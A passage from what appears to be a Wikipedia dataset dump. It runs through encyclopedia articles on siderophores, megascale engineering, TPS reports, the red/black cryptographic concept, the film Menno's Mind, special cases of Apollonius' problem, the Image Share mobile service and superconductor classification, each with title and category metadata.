The dilute nature of the pelagic marine environment promotes large diffusive losses and renders the efficiency of the normal siderophore-based iron uptake strategies problematic. However, many heterotrophic marine bacteria do produce siderophores, albeit with properties different from those produced by terrestrial organisms. Many marine siderophores are surface-active and tend to form molecular aggregates, for example aquachelins. The presence of the fatty acyl chain gives the molecules high surface activity and an ability to form micelles. Thus, when secreted, these molecules bind to surfaces and to each other, thereby slowing the rate of diffusion away from the secreting organism and maintaining a relatively high local siderophore concentration. Phytoplankton have high iron requirements and yet the majority (and possibly all) do not produce siderophores. Phytoplankton can, however, obtain iron from siderophore complexes with the aid of membrane-bound reductases and certainly from iron(II) generated via photochemical decomposition of iron(III) siderophores. Thus a large proportion of iron (possibly all iron) absorbed by phytoplankton is dependent on bacterial siderophore production. Plant pathogens Most plant pathogens invade the apoplasm by releasing pectolytic enzymes which facilitate the spread of the invading organism. Bacteria frequently infect plants by gaining entry to the tissue via the stomata. Having entered the plant they spread and multiply in the intercellular spaces. With bacterial vascular diseases, the infection is spread within the plants through the xylem. Once within the plant, the bacteria need to be able to scavenge iron from the two main iron-transporting ligands, nicotianamine and citrate. To do this they produce siderophores; thus the enterobacterium Erwinia chrysanthemi produces two siderophores, chrysobactin and achromobactin. The Xanthomonas group of plant pathogens produces xanthoferrin siderophores to scavenge the iron. As in humans, plants also possess siderophore-binding proteins involved in host defense, such as the major birch pollen allergen Bet v 1; such proteins are usually secreted and possess a lipocalin-like structure. Animal pathogens Pathogenic bacteria and fungi have developed the means of survival in animal tissue. They may invade the gastro-intestinal tract (Escherichia, Shigella and Salmonella), the lung (Pseudomonas, Bordetella, Streptococcus and Corynebacterium), skin (Staphylococcus) or the urinary tract (Escherichia and Pseudomonas). Such bacteria may colonise wounds (Vibrio and Staphylococcus) and be responsible for septicaemia (Yersinia and Bacillus). Some bacteria survive for long periods of time in intracellular organelles, for instance Mycobacterium. Because of this continual risk of bacterial and fungal invasion, animals have developed a number of lines of defence based on immunological strategies, the complement system, the production of iron–siderophore binding proteins and the general "withdrawal" of iron. There are two major types of iron-binding proteins present in most animals that provide protection against microbial invasion – extracellular protection is achieved by the transferrin family of proteins and intracellular protection is achieved by ferritin. Transferrin is present in the serum at approximately 30 μM, and contains two iron-binding sites, each with an extremely high affinity for iron.
Under normal conditions it is about 25–40% saturated, which means that any freely available iron in the serum will be immediately scavenged – thus preventing microbial growth. Most siderophores are unable to remove iron from transferrin. Mammals also produce lactoferrin, which is similar to serum transferrin but possesses an even higher affinity for iron. Lactoferrin is present in secretory fluids, such as sweat, tears and milk, thereby minimising bacterial infection. Ferritin is present in the cytoplasm of cells and limits the intracellular iron level to approximately 1 μM. Ferritin is a much larger protein than transferrin and is capable of binding several thousand iron atoms in a nontoxic form. Siderophores are unable to directly mobilise iron from ferritin. In addition to these two classes of iron-binding proteins, a hormone, hepcidin, is involved in controlling the release of iron from absorptive enterocytes, iron-storing hepatocytes and macrophages. Infection leads to inflammation and the release of interleukin-6 (IL-6), which stimulates hepcidin expression. In humans, IL-6 production results in low serum iron, making it difficult for invading pathogens to establish infection. Such iron depletion has been demonstrated to limit bacterial growth in both extracellular and intracellular locations. In addition to "iron withdrawal" tactics, mammals produce an iron–siderophore binding protein, siderocalin. Siderocalin is a member of the lipocalin family of proteins, which, while diverse in sequence, displays a highly conserved structural fold, an 8-stranded antiparallel β-barrel that forms a binding site with several adjacent β-strands. Siderocalin (lipocalin 2) has three positively charged residues also located in the hydrophobic pocket, and these create a high-affinity binding site for iron(III)–enterobactin. Siderocalin is a potent bacteriostatic agent against E. coli. As a result of infection it is secreted by both macrophages and hepatocytes, enterobactin being scavenged from the extracellular space. Medical applications Siderophores have applications in medicine for iron and aluminum overload therapy and as antibiotics for improved targeting. Understanding the mechanistic pathways of siderophores has led to opportunities for designing small-molecule inhibitors that block siderophore biosynthesis and therefore bacterial growth and virulence in iron-limiting environments. Siderophores are useful as drugs in facilitating iron mobilization in humans, especially in the treatment of iron diseases, due to their high affinity for iron. One potentially powerful application is to use the iron transport abilities of siderophores to carry drugs into cells by preparation of conjugates between siderophores and antimicrobial agents. Because microbes recognize and utilize only certain siderophores, such conjugates are anticipated to have selective antimicrobial activity. An example is the cephalosporin antibiotic cefiderocol. Microbial iron transport (siderophore)-mediated drug delivery makes use of the recognition of siderophores as iron delivery agents in order to have the microbe assimilate siderophore conjugates with attached drugs. These drugs are lethal to the microbe, causing it to die when it assimilates the siderophore conjugate. Through the addition of the iron-binding functional groups of siderophores into antibiotics, their potency has been greatly increased. This is due to the siderophore-mediated iron uptake system of the bacteria.
Agricultural applications Poaceae (grasses), including agriculturally important species such as barley and wheat, are able to efficiently sequester iron by releasing phytosiderophores via their roots into the surrounding soil rhizosphere. Chemical compounds produced by microorganisms in the rhizosphere can also increase the availability and uptake of iron. Plants such as oats are able to assimilate iron via these microbial siderophores. It has been demonstrated that plants are able to use the hydroxamate-type siderophores ferrichrome, rhodotorulic acid and ferrioxamine B; the catechol-type siderophore agrobactin; and the mixed-ligand catechol–hydroxamate–hydroxy acid siderophores biosynthesized by saprophytic root-colonizing bacteria. All of these compounds are produced by rhizospheric bacterial strains, which have simple nutritional requirements, and are found in nature in soils, foliage, fresh water, sediments, and seawater. Fluorescent pseudomonads have been recognized as biocontrol agents against certain soil-borne plant pathogens. They produce yellow-green pigments (pyoverdines) which fluoresce under UV light and function as siderophores. They deprive pathogens of the iron required for their growth and pathogenesis. Other metal ions chelated Siderophores, natural or synthetic, can chelate metal ions other than iron ions. Examples include aluminium, gallium, chromium, copper, zinc, lead, manganese, cadmium, vanadium, zirconium, indium, plutonium, berkelium, californium, and uranium. Related processes Alternative means of assimilating iron are surface reduction, lowering of pH, utilization of heme, or extraction of protein-complexed metal. Recent data suggest that iron-chelating molecules with properties similar to siderophores are produced by marine bacteria under phosphate-limiting growth conditions. In nature, phosphate binds to different types of iron minerals, and it has therefore been hypothesized that bacteria can use siderophore-like molecules to dissolve such complexes in order to access the phosphate. See also Ionophore Oxalic acid References Further reading Biomolecules Iron metabolism
Siderophore
[ "Chemistry", "Biology" ]
5,143
[ "Natural products", "Organic compounds", "Biomolecules", "Structural biology", "Biochemistry", "Molecular biology" ]
1,065,499
https://en.wikipedia.org/wiki/Megascale%20engineering
Megascale engineering (or macro-engineering) is a form of exploratory engineering concerned with the construction of structures on an enormous scale. Typically these structures are at least 1,000 km (one megameter) in length, hence the name. Such large-scale structures are termed megastructures. In addition to large-scale structures, megascale engineering is also defined as including the transformation of entire planets into a human-habitable environment, a process known as terraforming or planetary engineering. This might also include transformation of the surface conditions, changes in the planetary orbit, and structures in orbit intended to modify the energy balance. Astroengineering is the extension of megascale engineering to megastructures on a stellar scale or larger, such as Dyson spheres, Ringworlds, and Alderson disks. Several megascale structure concepts such as Dyson spheres, Dyson swarms, and Matrioshka brains would likely be built upon space-based solar power satellites. Other planetary engineering or interstellar transportation concepts would likely require space-based solar power satellites and the accompanying space logistics infrastructure for their power or construction. Megascale engineering often plays a major part in the plot of science fiction movies and books. The micro-gravity environment of outer space provides several potential benefits for the engineering of these structures. These include minimizing the loads on the structure, the availability of large quantities of raw materials in the form of asteroids, and an ample supply of energy from the Sun. The capabilities to employ these advantages are not yet available, however, so they provide material for science fiction themes. Quite a few megastructures have been designed on paper as exploratory engineering. However, the list of existing and planned megastructures is complicated by the ambiguity in classifying what exactly constitutes a megastructure. By strict definition, no megastructures currently exist (with the space elevator being the only such project under serious consideration). By more lenient definitions, the Great Wall of China counts as a megastructure. A more complete list of conceptual and existing megastructures, along with a discussion of megastructure criteria, is found under megastructure. Of all the proposed megastructures, only the orbital elevator, the Lofstrom launch loop, and Martian or lunar space elevator concepts could be built using conventional engineering techniques, and are within the grasp of current materials science. Carbon nanotubes may have the requisite tensile strength for the more technologically challenging Earth-based space elevator, but the creation of nanotubes of the required length remains a laboratory exercise, and adequate cable-scale technology has not yet been demonstrated. The assembly of structures more massive than a space elevator would likely involve a combination of new engineering techniques, new materials, and new technologies. Such massive construction projects might require the use of self-replicating machines to provide a suitably large "construction crew". The use of nanotechnology might provide both the self-replicating assemblers and the specialized materials needed for such a project. Nanotechnology is, however, another area of speculative exploratory engineering at this time. See also Kardashev scale Macro-engineering Space manufacturing Stellar engineering References Megastructures Engineering projects Exploratory engineering
Megascale engineering
[ "Technology", "Engineering" ]
693
[ "Exploratory engineering", "nan", "Megastructures" ]
1,065,521
https://en.wikipedia.org/wiki/TPS%20report
A TPS report ("test procedure specification") is a document used by a quality assurance group or individual, particularly in software engineering, that describes the testing procedures and the testing process. Definition The official definition and creation is provided by the Institute of Electrical and Electronics Engineers (IEEE) as follows: In popular culture Office Space Its use in popular culture increased after the comedic 1999 film Office Space. In the movie, multiple managers and coworkers inquire about an error that protagonist Peter Gibbons (played by Ron Livingston) makes in omitting a cover sheet to send with his "TPS reports". It is used by Gibbons as an example that he has eight different bosses to whom he directly reports. According to the film's writer and director Mike Judge, the abbreviation stood for "Test Program Set" in the movie. After Office Space, "TPS report" has come to connote pointless, mindless paperwork, and an example of "literacy practices" in the work environment that are "meaningless exercises imposed upon employees by an inept and uncaring management" and "relentlessly mundane and enervating". Other references and allusions In the 1991 film Don't Tell Mom the Babysitter's Dead the main character Sue Ellen (portrayed by Christina Applegate) is expected to know how to complete TPS reports. Once handed the insurmountable of paperwork to complete, she passes the work off to a very willing co-worker Cathy (portrayed by Kimmy Robertson) who handles the reports, but is intercepted by Sue Ellen's nemesis who attempts to use it as leverage as a means to get the main character fired. In King of the Hill (also produced by Mike Judge), Kahn is being chewed out, then remarks to his boss "No sir, I filed my TPS report yesterday." The 2015 puzzle video game Please, Don't Touch Anything featured the question "What is a TPS Report?" as one of many hidden clues that lead to a unique ending. In Lost season 1, episode 4, John Locke's boss says "Locke, I told you I need those TPS reports done by noon today." In Ralph Breaks the Internet, a TPS report is visibly hanging in one of the accounting department cubicles during Ralph's viral video montage. While Test Procedure Specification reports are not functionally relevant within accounting, this usage shows how the term has grown to symbolize all kinds of meaningless memoranda. In Borderlands 2, a legendary weapon is named the "Actualizer" with a flavor text description of "We need to talk about your DPS reports", parodying the corporate term by replacing it with the common gaming abbreviation for "Damage Per Second". In The Mandalorian, TPS reports are mentioned in the episode "Chapter 15: The Believer" as work to do by the character Migs Mayfeld when attempting to avoid an imperial officer, in a reference to Office Space. The TV series The Family Man features a scene in series 2, episode 1 in which the manager of the protagonist asks him to "start thinking about your TPS reports!", in amongst other apparent references to Office Space. In the NCIS episode "Starting Over", Gary Cole's Agent Parker mentions his least favorite paperwork being TPS reports. When McGee corrects him telling him they're "TBS reports", he says, "Ah, old habits, weird", then takes a sip of coffee, paying homage to his Office Space character, Bill Lumbergh. In Season 4, Episode 10 ("High") of Rescue Me, Janet Gavin starts a new job and hands off a TPS report at the beginning of the scene. 
In the Terry Tate: Office Linebacker commercials, Terry Tate yells, "You know you need a cover sheet on your TPS reports, Richard!" In Season 2, during the first segment of the 28th episode of Puppy Dog Pals titled "Take Your Dog to Work Day", while Bingo and Rolly are playing office, Bingo says "One sec Rolly, these TPS reports aren't gonna fix themselves." In Doom (2016), some control consoles in early levels reference TPS reports. Early in Black Mesa, protagonist Gordon Freeman encounters two scientists discussing TPS reports. References External links Printable PDF TPS Report Software testing Popular culture neologisms Computer humour
TPS report
[ "Engineering" ]
892
[ "Software engineering", "Software testing" ]
1,065,533
https://en.wikipedia.org/wiki/Red/black%20concept
The red/black concept, sometimes called the red–black architecture or red/black engineering, refers to the careful segregation in cryptographic systems of signals that contain sensitive or classified plaintext information (red signals) from those that carry encrypted information, or ciphertext (black signals). Therefore, the red side is usually considered the internal side, and the black side the more public side, often with some sort of guard, firewall or data diode between the two. In NSA jargon, encryption devices are often called blackers, because they convert red signals to black. TEMPEST standards, spelled out in NSTISSAM TEMPEST/2-95, specify shielding or a minimum physical distance between wires or equipment carrying or processing red and black signals. Different organizations have differing requirements for the separation of red and black fiber-optic cables. Red/black terminology is also applied to cryptographic keys. Black keys have themselves been encrypted with a "key encryption key" (KEK) and are therefore benign. Red keys are not encrypted and must be treated as highly sensitive material. Red/Gray/Black The NSA's Commercial Solutions for Classified (CSfC) program, which uses two layers of independent, commercial off-the-shelf cryptographic products to protect classified information, includes a red/gray/black concept. In this extension of the red/black concept, the separated gray compartment handles data that has been encrypted only once, which happens at the red/gray boundary. The gray/black interface adds or removes a second layer of encryption. See also Computer security Secure by design Security engineering References Cryptography Secure communication Security engineering
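The red/black key distinction described above can be illustrated with the standard AES key-wrap construction (RFC 3394). The following is a minimal sketch, assuming the Python cryptography package; the key values are random placeholders, not real key material, and the variable names are illustrative only.

```python
# Minimal sketch of red -> black key conversion via AES key wrap (RFC 3394),
# assuming the Python "cryptography" package. Keys below are placeholders.
import os
from cryptography.hazmat.primitives.keywrap import aes_key_wrap, aes_key_unwrap

kek = os.urandom(32)      # key-encryption key, held inside the red boundary
red_key = os.urandom(32)  # plaintext (red) traffic key: highly sensitive

# Wrapping under the KEK yields a black key, benign enough to distribute
# or store on the black side.
black_key = aes_key_wrap(kek, red_key)

# Only a device holding the KEK can recover the red key from the black one.
assert aes_key_unwrap(kek, black_key) == red_key
```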
Red/black concept
[ "Mathematics", "Engineering" ]
336
[ "Systems engineering", "Cybersecurity engineering", "Cryptography", "Security engineering", "Applied mathematics" ]
16,429,700
https://en.wikipedia.org/wiki/Menno%27s%20Mind
Menno's Mind is a 1997 film directed by Jon Kroll for Showtime. The film stars Billy Campbell, Stephanie Romanov, Corbin Bernsen, and Michael Dorn. The screenplay was written by Mark Valenti. Plot synopsis Campbell plays the titular Menno, a computer programmer at a virtual reality resort that allows visitors to escape into simulations of their fantasies. The technology is being employed for election fraud by the chief of security (Corbin Bernsen). The resistance leader recruits Menno to fight the corruption. References External links 1997 films Films about computing Films scored by Christopher Franke 1990s English-language films 1997 science fiction films English-language science fiction films
Menno's Mind
[ "Technology" ]
135
[ "Works about computing", "Films about computing" ]
16,429,785
https://en.wikipedia.org/wiki/Special%20cases%20of%20Apollonius%27%20problem
In Euclidean geometry, Apollonius' problem is to construct all the circles that are tangent to three given circles. Special cases of Apollonius' problem are those in which at least one of the given circles is a point or line, i.e., is a circle of zero or infinite radius. The nine types of such limiting cases of Apollonius' problem are to construct the circles tangent to: three points (denoted PPP, generally 1 solution) three lines (denoted LLL, generally 4 solutions) one line and two points (denoted LPP, generally 2 solutions) two lines and a point (denoted LLP, generally 2 solutions) one circle and two points (denoted CPP, generally 2 solutions) one circle, one line, and a point (denoted CLP, generally 4 solutions) two circles and a point (denoted CCP, generally 4 solutions) one circle and two lines (denoted CLL, generally 8 solutions) two circles and a line (denoted CCL, generally 8 solutions) In a different type of limiting case, the three given geometrical elements may have a special arrangement, such as constructing a circle tangent to two parallel lines and one circle. Historical introduction Like most branches of mathematics, Euclidean geometry is concerned with proofs of general truths from a minimum of postulates. For example, a simple proof would show that at least two angles of an isosceles triangle are equal. One important type of proof in Euclidean geometry is to show that a geometrical object can be constructed with a compass and an unmarked straightedge; an object can be constructed if and only if the lengths defining it can be expressed from the given lengths using only addition, subtraction, multiplication, division and the extraction of square roots. Therefore, it is important to determine whether an object can be constructed with compass and straightedge and, if so, how it may be constructed. Euclid developed numerous constructions with compass and straightedge. Examples include: regular polygons such as the pentagon and hexagon, a line parallel to another that passes through a given point, etc. Many rose windows in Gothic cathedrals, as well as some Celtic knots, can be designed using only Euclidean constructions. However, some geometrical constructions are not possible with those tools, including the regular heptagon and the trisection of an angle. Apollonius contributed many constructions, namely, finding the circles that are tangent to three geometrical elements simultaneously, where the "elements" may be a point, line or circle. Rules of Euclidean constructions In Euclidean constructions, five operations are allowed: Draw a line through two points Draw a circle through a point with a given center Find the intersection point of two lines Find the intersection points of two circles Find the intersection points of a line and a circle The initial elements in a geometric construction are called the "givens", such as a given point, a given line or a given circle. Example 1: Perpendicular bisector To construct the perpendicular bisector of the line segment between two points requires two circles, each centered on an endpoint and passing through the other endpoint (operation 2). The intersection points of these two circles (operation 4) are equidistant from the endpoints. The line through them (operation 1) is the perpendicular bisector. Example 2: Angle bisector To generate the line that bisects the angle between two given rays requires a circle of arbitrary radius centered on the intersection point P of the two lines (2). The intersection points of this circle with the two given lines (5) are T1 and T2.
Two circles of the same radius, centered on T1 and T2, intersect at points P and Q. The line through P and Q (1) is an angle bisector. Rays have one angle bisector; lines have two, perpendicular to one another. Preliminary results A few basic results are helpful in solving special cases of Apollonius' problem. Note that a line and a point can be thought of as circles of infinitely large and infinitely small radius, respectively. A circle is tangent to a point if it passes through the point, and tangent to a line if they intersect at a single point P, which happens exactly when the line is perpendicular to the radius drawn from the circle's center to P. Circles tangent to two given points must have their centers on the perpendicular bisector of those points. Circles tangent to two given lines must have their centers on an angle bisector of the lines. To construct a tangent line to a circle from a given external point, draw a semicircle centered on the midpoint between the center of the circle and the given point; its intersections with the circle are the points of tangency. Power of a point and the harmonic mean: the radical axis of two circles is the set of points with equal tangent lengths to the two circles or, more generally, with equal power. Under inversion, circles may be transformed into lines, and circles into other circles. If two circles are internally tangent, they remain so if their radii are increased or decreased by the same amount. Conversely, if two circles are externally tangent, they remain so if their radii are changed by the same amount in opposite directions, one increasing and the other decreasing. Types of solutions Type 1: Three points PPP problems generally have a single solution. As shown above, if a circle passes through two given points P1 and P2, its center must lie somewhere on the perpendicular bisector line of the two points. Therefore, if the solution circle passes through three given points P1, P2 and P3, its center must lie on the perpendicular bisectors of P1P2, P2P3 and P1P3. At least two of these bisectors must intersect, and their intersection point is the center of the solution circle. The radius of the solution circle is the distance from that center to any one of the three given points (a coordinate version of this construction is sketched at the end of this section). Type 2: Three lines LLL problems generally offer 4 solutions. As shown above, if a circle is tangent to two given lines, its center must lie on one of the two lines that bisect the angle between the two given lines. Therefore, if a circle is tangent to three given lines L1, L2, and L3, its center C must be located at the intersection of the bisecting lines of the three given lines. In general, there are four such points, giving four different solutions for the LLL Apollonius problem. The radius of each solution is determined by finding a point of tangency T, which may be done by choosing one of the three intersection points P of the given lines and drawing a circle centered on the midpoint of C and P with diameter equal to the distance between C and P. The intersections of that circle with the intersecting given lines are the two points of tangency. Type 3: One point, two lines PLL problems generally have 2 solutions. As shown above, if a circle is tangent to two given lines, its center must lie on one of the two lines that bisect the angle between the two given lines. By symmetry, if such a circle passes through a given point P, it must also pass through a point Q that is the "mirror image" of P about the angle bisector. The two solution circles pass through both P and Q, and their radical axis is the line connecting those two points. Consider point G at which the radical axis intersects one of the two given lines.
Since every point on the radical axis has the same power relative to each circle, the distances |GT1| and |GT2| to the solution tangent points T1 and T2 are equal to each other, and their square equals the product |GP|·|GQ|. Thus, both distances are equal to the geometric mean of |GP| and |GQ|. From G and this distance, the tangent points T1 and T2 can be found. Then, the two solution circles are the circles that pass through the three points (P, Q, T1) and (P, Q, T2), respectively. Type 4: Two points, one line PPL problems generally have 2 solutions. If a line m drawn through the given points P and Q is parallel to the given line l, the tangent point T of the circle with l is located at the intersection of the perpendicular bisector of PQ with l. In that case, the sole solution circle is the circle that passes through the three points P, Q and T. If the line m is not parallel to the given line l, then it intersects l at a point G. By the power-of-a-point theorem, the distance from G to a tangent point T must equal the geometric mean of |GP| and |GQ|. The two points on the given line l located at this distance from G may be denoted T1 and T2. The two solution circles are the circles that pass through the three points (P, Q, T1) and (P, Q, T2), respectively. Compass and straightedge construction The two circles in the Two points, one line problem, where the line through P and Q is not parallel to the given line l, can be constructed with compass and straightedge by: Draw the line m through the given points P and Q. The point G is where the lines l and m intersect. Draw circle C that has PQ as diameter. Draw one of the tangents from G to circle C. Point A is where the tangent and the circle touch. Draw circle D with center G through A. Circle D cuts line l at the points T1 and T2. One of the required circles is the circle through P, Q and T1. The other circle is the circle through P, Q and T2. The fastest construction (if the intersections of l with both (PQ) and the central perpendicular to [PQ] are available; based on Gergonne's approach): Draw a line m through P and Q intersecting l at G. Draw a perpendicular n through the middle of [PQ] intersecting l at O. Draw a circle w centered at O with radius |OP| = |OQ|. Draw a circle W with [OG] as a diameter intersecting w at M1 and M2. Draw a circle v centered at G with radius |GM1| = |GM2| intersecting l at T1 and T2. The circles passing through P, Q, T1 and P, Q, T2 are solutions. The universal construction (if the intersections of l with either (PQ) or the central perpendicular to [PQ] are unavailable or do not exist): Draw a perpendicular n through the middle of [PQ] (point R). Draw a perpendicular k to l through P or Q intersecting l at K. Draw a circle w centered at R with radius |RK|. Draw two lines n1 and n2 passing through P and Q parallel to n and intersecting w at points A1, A2 and B1, B2, respectively. Draw two lines (A1B1) and (A2B2) intersecting l at T1 and T2, respectively. The circles passing through P, Q, T1 and P, Q, T2 are solutions. Type 5: One circle, two points CPP problems generally have 2 solutions. Consider a circle centered on one given point P that passes through the second point, Q. Since the solution circle must pass through P, inversion in this circle transforms the solution circle into a line lambda. The same inversion transforms Q into itself, and (in general) the given circle C into another circle c. Thus, the problem becomes that of finding a solution line that passes through Q and is tangent to c, which was solved above; there are two such lines.
Re-inversion produces the two corresponding solution circles of the original problem. Type 6: One circle, one line, one point CLP problems generally have 4 solutions. The solution of this special case is similar to that of the CPP Apollonius solution. Draw a circle centered on the given point P; since the solution circle must pass through P, inversion in this circle transforms the solution circle into a line lambda. In general, the same inversion transforms the given line L and the given circle C into two new circles, c1 and c2. Thus, the problem becomes that of finding a solution line tangent to the two inverted circles, which was solved above. There are four such lines, and re-inversion transforms them into the four solution circles of the Apollonius problem. Type 7: Two circles, one point CCP problems generally have 4 solutions. The solution of this special case is similar to that of CPP. Draw a circle centered on the given point P; since the solution circle must pass through P, inversion in this circle transforms the solution circle into a line lambda. In general, the same inversion transforms the given circles C1 and C2 into two new circles, c1 and c2. Thus, the problem becomes that of finding a solution line tangent to the two inverted circles, which was solved above. There are four such lines, and re-inversion transforms them into the four solution circles of the original Apollonius problem. Type 8: One circle, two lines CLL problems generally have 8 solutions. This special case is solved most easily using scaling. The given circle is shrunk to a point, and the radius of the solution circle is either decreased by the same amount (for an internally tangent solution) or increased (for an externally tangent solution). Depending on whether the solution circle's radius is increased or decreased, the two given lines are displaced parallel to themselves by the same amount, depending on which quadrant the center of the solution circle falls in. This shrinking of the given circle to a point reduces the problem to the PLL problem, solved above. In general, there are two such solutions per quadrant, giving eight solutions in all. Type 9: Two circles, one line CCL problems generally have 8 solutions. The solution of this special case is similar to that of CLL. The smaller circle is shrunk to a point, while the radii of the larger given circle and any solution circle are adjusted, and the line is displaced parallel to itself, according to whether they are internally or externally tangent to the smaller circle. This reduces the problem to CLP. Each CLP problem has four solutions, as described above, and there are two such problems, depending on whether the solution circle is internally or externally tangent to the smaller circle. Special cases with no solutions An Apollonius problem is impossible if the given circles are nested, i.e., if one of the given circles is completely enclosed within a second one and the remaining circle is completely excluded. This follows because any solution circle would have to cross over the middle circle to move from its tangency to the inner circle to its tangency with the outer circle. This general result has several special cases when the given circles are shrunk to points (zero radius) or expanded to straight lines (infinite radius). For example, the CCL problem has zero solutions if the two circles are on opposite sides of the line since, in that case, any solution circle would have to cross the given line non-tangentially to go from the tangent point of one circle to that of the other.
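As referenced above, the simplest cases translate directly into coordinate computations. The following is a minimal sketch in plain Python, with hypothetical helper names not taken from any source: the PPP construction via the intersection of two perpendicular bisectors, and the tangent-point distance used in the PPL case via the power of a point.

```python
# Coordinate sketch of the PPP and PPL cases (hypothetical helper names).
from math import hypot, sqrt

def circle_through_three_points(p1, p2, p3):
    """PPP case: the center is the intersection of two perpendicular bisectors."""
    (x1, y1), (x2, y2), (x3, y3) = p1, p2, p3
    # Equidistance from p1/p2 and from p1/p3 gives a 2x2 linear system.
    a1, b1 = 2 * (x2 - x1), 2 * (y2 - y1)
    c1 = x2**2 - x1**2 + y2**2 - y1**2
    a2, b2 = 2 * (x3 - x1), 2 * (y3 - y1)
    c2 = x3**2 - x1**2 + y3**2 - y1**2
    det = a1 * b2 - a2 * b1            # zero iff the three points are collinear
    cx = (c1 * b2 - c2 * b1) / det
    cy = (a1 * c2 - a2 * c1) / det
    return (cx, cy), hypot(cx - x1, cy - y1)

def ppl_tangent_distance(g, p, q):
    """PPL case: |GT| is the geometric mean of |GP| and |GQ| (power of a point)."""
    gp = hypot(p[0] - g[0], p[1] - g[1])
    gq = hypot(q[0] - g[0], q[1] - g[1])
    return sqrt(gp * gq)

center, radius = circle_through_three_points((0, 0), (4, 0), (0, 3))
print(center, radius)  # (2.0, 1.5) 2.5 -- circumcircle of a 3-4-5 right triangle
```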
See also Problem of Apollonius Compass and straightedge constructions References Benjamin Alvord (1855) Tangencies of Circles and of Spheres, Smithsonian Contributions, volume 8, from Google Books. Euclidean plane geometry
Special cases of Apollonius' problem
[ "Mathematics" ]
3,080
[ "Planes (geometry)", "Euclidean plane geometry" ]
16,431,173
https://en.wikipedia.org/wiki/Image%20Share
Image Share is a service for sharing images between users during a mobile phone call. It has been specified for use in a 3GPP-compliant cellular network by the GSM Association in the PRD IR.79 Image Share Interoperability Specification. According to the specification, "The terminal interoperable Image Share service allows users to share Images between them over PS connection with ongoing CS call, thus enhancing and enriching end-users voice communication." An Image Share session begins by the end-users setting up a normal circuit switched (CS) voice call. After the voice call is set up, the terminals perform a registration to an IMS core system over a packet switched (PS) connection. Then, based on successful capability negotiation between the terminals, the end-user is presented with an option in the terminal UI to share one or several images. If this is selected, the images are transferred between the Image Share software clients located in the mobile phones using the PS connection and the recipient is able to see them, while the normal CS voice session continues uninterrupted. Image Share can be seen as a spin-off from the Video Share mobile phone service. Video Share has been commercially launched, for example by AT&T in the USA, but Image Share is not yet available from any mobile operator or service provider. Technical features Interoperable multi-vendor compliant service, i.e. Image Share works across different mobile phones from various vendors (as long as they have the necessary software client installed) IMS service, i.e. a 3GPP-compliant IMS core system is required for the service provider/operator offering Image Share CSI (CS and IMS combinational) service compliant with 3GPP specifications TS 22.279, TS 23.279 and TS 24.279, i.e. a CS voice call must be set up prior to sharing the images SIP used for signaling via IMS, i.e. registration for the service is performed using the capabilities offered by the IMS platform with the SIP protocol MSRP (Message Session Relay Protocol, RFC 4975) used for transporting media between the mobile phones IETF file transfer mechanisms utilized for negotiating shared images between offerer and answerer via the SIP/SDP offer/answer model Capability query performed using the SIP OPTIONS method between the mobile phones to find out whether the recipient is Image Share capable (an illustrative example is given below) Peer-to-peer service, i.e. no server is required in the network for sharing the images Both live and pre-stored images can be shared between the participating mobile phones Requires a 3G or EDGE DTM (Dual Transfer Mode) mobile network Usage According to a GSMA press release, interoperability between different Image Share clients was successfully tested in a multi-vendor trial in May 2007, including interworking between multiple networks. No mobile operator has launched Image Share so far (as of March 2008).
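The capability query mentioned above is an ordinary SIP OPTIONS transaction as defined in RFC 3261. The sketch below builds such a request as a Python string; the message structure follows the RFC, but the feature tag advertising Image Share support is a hypothetical placeholder, since the exact tag is defined in GSMA PRD IR.79 rather than reproduced here.

```python
# Illustrative SIP OPTIONS capability query (RFC 3261 message syntax).
# The Accept-Contact feature tag below is a hypothetical placeholder;
# the real Image Share tag is defined in GSMA PRD IR.79.
options_request = "\r\n".join([
    "OPTIONS sip:bob@operator.example SIP/2.0",
    "Via: SIP/2.0/UDP alice-ue.operator.example;branch=z9hG4bK776asdhds",
    "Max-Forwards: 70",
    "From: <sip:alice@operator.example>;tag=1928301774",
    "To: <sip:bob@operator.example>",
    "Call-ID: a84b4c76e66710",
    "CSeq: 63104 OPTIONS",
    "Accept-Contact: *;+g.imageshare",  # hypothetical feature tag
    "Content-Length: 0",
    "", "",
])
# A 200 OK response advertising the same feature tag in its Contact header
# would indicate that the remote terminal supports Image Share.
```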
See also Video Share, which (re)uses a similar basic architecture IM, especially OMA SIMPLE IM, which also utilizes MSRP for transporting media MMS, which also provides the means for users to exchange images between mobile phones Multiple different file/image sharing applications & services available from various companies References GSM Association PRD IR.79 Image Share Interoperability Specification IETF RFC 4975 Message Session Relay Protocol 3GPP TS 22.279 Combined Circuit Switched (CS) and IP Multimedia Subsystem (IMS) sessions; Stage 1 3GPP TS 23.279 Combining Circuit Switched (CS) and IP Multimedia Subsystem (IMS) services; Stage 2 3GPP TS 24.279 Combining Circuit Switched (CS) and IP Multimedia Subsystem (IMS) services; Stage 3 IMS services
Image Share
[ "Technology" ]
747
[ "IMS services" ]
16,434,453
https://en.wikipedia.org/wiki/Superconductor%20classification
Superconductors can be classified in accordance with several criteria that depend on physical properties, current understanding, and the expense of cooling them or their material. By their magnetic properties Type I superconductors: those having just one critical field (Hc) and changing abruptly from one state to the other when it is reached. Type II superconductors: those having two critical fields, Hc1 and Hc2, behaving as perfect superconductors below the lower critical field (Hc1), leaving the superconducting state completely for a normally conducting state above the upper critical field (Hc2), and existing in a mixed state between the two critical fields. Type-1.5 superconductors: multicomponent superconductors characterized by two or more coherence lengths. By their agreement with conventional models Conventional superconductors: those which can be fully explained with BCS theory or related theories. Unconventional superconductors: those which fail to be explained using such theories, such as: Heavy fermion superconductors This criterion is useful as BCS theory has successfully explained the properties of conventional superconductors since 1957, yet there have been no satisfactory theories to fully explain unconventional superconductors. In most cases conventional superconductors are type I, but there are exceptions such as niobium, which is both conventional and type II. By their critical temperature Low-temperature superconductors, or LTS: those whose critical temperature is below 77 K. High-temperature superconductors, or HTS: those whose critical temperature is above 77 K. Room-temperature superconductors: those whose critical temperature is above 273 K. The demarcation point of 77 K is used to emphasize whether or not superconductivity in a material can be achieved with liquid nitrogen (whose boiling point is 77 K), which is much more practical than the liquid helium required to reach the critical temperatures of low-temperature superconductors. By material constituents and structure Some pure elements, such as lead or mercury (but not all, as some elements never reach the superconducting phase). Some allotropes of carbon, such as fullerenes, nanotubes, or diamond. Most superconductors made of pure elements are type I (except niobium, technetium, vanadium, silicon, and the above-mentioned carbon allotropes). Alloys, such as niobium–titanium (NbTi), whose superconducting properties were discovered in 1962. Ceramics (often insulators in the normal state), which include Cuprates i.e. copper oxides (often layered, not isotropic) The YBCO family, which are several 